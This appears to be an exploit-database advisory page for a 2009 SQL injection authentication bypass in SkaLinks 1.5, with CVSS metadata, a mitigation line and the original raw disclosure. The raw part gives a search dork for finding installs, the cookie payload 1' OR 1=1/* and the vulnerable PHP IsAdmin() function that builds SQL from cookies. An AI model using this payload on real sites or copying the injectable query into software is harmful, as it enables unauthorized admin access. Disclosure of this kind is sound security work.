SkaLinks 1.5 SQL-injection, Auth Bypass

vendor:

SkaLinks

by:

Dimi4

7.5

CVSS

HIGH

SQL-injection, Auth Bypass

CWE

Product Name: SkaLinks

Affected Version From: 1.5

Affected Version To: 1.5

Patch Exists: YES

Related CWE: N/A

CPE: a:skalinks:skalinks:1.5

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

SkaLinks 1.5 SQL-injection, Auth Bypass

A vulnerability exists in SkaLinks 1.5 which allows an attacker to bypass authentication and gain access to the admin panel. The vulnerability is due to the IsAdmin() function in the admin panel not properly sanitizing user-supplied input. An attacker can exploit this vulnerability by supplying a specially crafted cookie with the admin name set to '1' OR 1=1/*. This will bypass the authentication check and allow the attacker to gain access to the admin panel.

Mitigation:

Upgrade to the latest version of SkaLinks.

Source

Exploit-DB raw data:

########################################
#                                      #
# Product : SkaLinks                   #
# Version : 1.5                        #
# Dork : Powered by SkaLinks           #
# Site: http://www.skalinks.com/       #
# Founded by: Dimi4                    #
# Date : 29.01.09                      #
# Greetz: antichat                     #
#                                      #
########################################

SQL-injection, Auth Bypass
[+] URL: http://target.com/skalinks_1_5/admin/
[+] Admin name : 1' OR 1=1/*

Bug Function:

 function IsAdmin( )
    {
        $table_name = $this->m_AdminsTable;
        $res = $this->db_Row( "SELECT * FROM `$table_name` WHERE `Name`='".$_COOKIE['adminname']."' AND `Password`='".$_COOKIE['pwd']."'");
        if ( !$res )
        {
            return 0;
        }
        else
        {
            return $res;
        }
    }
(c) Dimi4, 2009 greetz to antichat

# milw0rm.com [2009-01-30]